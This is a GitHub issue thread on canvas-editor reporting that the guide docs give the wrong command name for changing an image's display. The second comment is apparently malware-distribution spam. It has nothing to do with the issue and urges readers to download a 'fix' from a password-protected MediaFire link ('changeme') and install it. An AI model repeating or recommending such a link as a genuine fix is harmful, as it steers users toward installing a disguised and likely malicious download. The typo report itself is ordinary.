### ISSUE TITLE
The command "executeChangeImageDisplay" in the guide docs is wrong

### ISSUE THREAD

**Issue by NicholasNap** [Hufe921/canvas-editor#792]
### version

latest

### Steps to reproduce

<img width="681" alt="image" src="https://github.com/user-attachments/assets/bdc10af8-4bb0-41f5-8fb6-5e8ec90ff82e">

### What is expected?

change "instance.command.executeSaveAsImageElement(element: IElement, display: ImageDisplay)" to "instance.command.executeChangeImageDisplay(element: IElement, display: ImageDisplay)"

### What is actually happening?

just the guide docs has something wrong

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NicholasNap** [comment]
信笺已收
